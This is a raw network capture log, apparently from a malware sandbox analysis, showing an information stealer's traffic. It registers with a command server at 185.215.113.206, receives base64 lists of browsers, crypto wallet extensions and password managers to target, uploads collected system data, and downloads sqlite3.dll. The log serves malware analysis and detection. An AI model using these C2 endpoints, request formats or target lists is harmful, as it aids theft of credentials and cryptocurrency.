Dec 9, 2024 08:08:23.977544069 CET	1236	IN	Data Raw: de 32 e6 44 eb 3e 82 6e a7 c6 f4 24 0c 82 1a 39 d2 0e 84 ec 91 3c e8 9e ea c0 b9 18 bb b2 7f 5d 63 a4 33 f0 bb 16 a8 68 bf c0 9a 5e 93 74 c0 3c b8 02 9b 3e 4f c2 32 66 78 32 f3 c8 e9 22 83 44 16 18 b6 70 76 c0 1a 9d ba 8e 83 3a 15 b1 68 a8 be c0 Data Ascii: 2D>n$9<]c3h^t<>O2fx2"Dpv:hH~s~ulCqTRlCGAB>>NxrZSm9=v2 v>uktfF9tyAn1hq@22@N^tF`Y
Dec 9, 2024 08:08:24.097047091 CET	1236	IN	Data Raw: a5 63 17 3a 96 b6 fd 5e cc c6 c9 15 9d a2 2f 5d bd 04 11 31 67 3b 7f 77 82 a7 31 85 5d ca 47 0e e2 94 8c 30 3d a9 61 57 5b c8 99 78 c4 3b 52 59 24 82 3c 5a 56 fe ef 2d 4d b9 81 5e a5 ff ec 84 02 3a c0 36 9f 83 1a 7c f3 52 0d f6 7e a7 8c 92 43 8a Data Ascii: c:^/]1g;w1]G0=aW[x;RY$<ZV-M^:6\|R~C,4p}A`etcx8@!FrI4~/I"z$T712O`[@a1.PuC'@Vk?RO_W;fet9el:K&hR:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49826	185.215.113.43	80	7804	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:29.415162086 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 33 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013373001&unit=246122658369
Dec 9, 2024 08:08:30.761097908 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 07:08:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49827	185.215.113.206	80	1608	C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:08:30.237087011 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 9, 2024 08:08:31.597182035 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 9, 2024 08:08:31.600111008 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 39 39 31 45 36 43 39 44 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="hwid"3A991E6C9D534228319403------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build"stok------DAAFBAKECAEGCBFIEGDG--
Dec 9, 2024 08:08:32.356307030 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:31 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 41 32 4d 32 55 79 4e 6d 4e 6c 4f 57 49 30 4e 54 6b 78 5a 47 59 33 4e 7a 59 33 59 54 51 79 59 32 5a 6b 5a 57 4d 7a 4e 7a 49 7a 5a 6d 46 69 5a 44 42 6c 4d 32 49 33 4f 54 5a 6c 5a 47 49 7a 4d 32 4d 32 4f 54 63 79 5a 54 59 77 4d 6a 67 7a 5a 6d 52 6b 4e 44 42 6d 4d 57 45 31 4e 6a 63 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzA2M2UyNmNlOWI0NTkxZGY3NzY3YTQyY2ZkZWMzNzIzZmFiZDBlM2I3OTZlZGIzM2M2OTcyZTYwMjgzZmRkNDBmMWE1NjcyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 9, 2024 08:08:32.361062050 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="message"browsers------DGHCBAAEHCFIDGDHJEHC--
Dec 9, 2024 08:08:32.806113958 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 9, 2024 08:08:32.806199074 CET	124	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdT
Dec 9, 2024 08:08:32.999033928 CET	896	IN	Data Raw: 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 78 44 61 47 56 6b 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46 Data Ascii: dGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHB
Dec 9, 2024 08:08:33.001091003 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHC Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="message"plugins------ECFHIJKJKFIDHJKFBGHC--
Dec 9, 2024 08:08:33.445432901 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 9, 2024 08:08:33.445477962 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 9, 2024 08:08:33.445487976 CET	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 9, 2024 08:08:33.445626974 CET	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Dec 9, 2024 08:08:33.445781946 CET	1236	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
Dec 9, 2024 08:08:33.453887939 CET	1236	IN	Data Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
Dec 9, 2024 08:08:33.453927994 CET	916	IN	Data Raw: 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d Data Ascii: bWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWp
Dec 9, 2024 08:08:33.455363989 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 36 63 65 39 62 34 35 39 31 64 66 37 37 36 37 61 34 32 63 66 64 65 63 33 37 32 33 66 61 62 64 30 65 33 62 37 39 36 65 64 62 33 33 63 36 39 37 32 65 36 30 32 38 33 66 64 64 34 30 66 31 61 35 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="message"fplugins------AKEBFCFIJJKKECAKJEHD--
Dec 9, 2024 08:08:33.899096966 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:33 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 9, 2024 08:08:34.109849930 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD Host: 185.215.113.206 Content-Length: 6763 Connection: Keep-Alive Cache-Control: no-cache
Dec 9, 2024 08:08:34.109882116 CET	6763	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 36 33 65 32 Data Ascii: ------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="token"3063e26ce9b4591df7767a42cfdec3723fabd0e3b796edb33c6972e60283fdd40f1a5672------FBKJDGCGDAAAKECAKKJDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 9, 2024 08:08:35.191668987 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 9, 2024 08:08:35.461679935 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 9, 2024 08:08:35.903518915 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 07:08:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 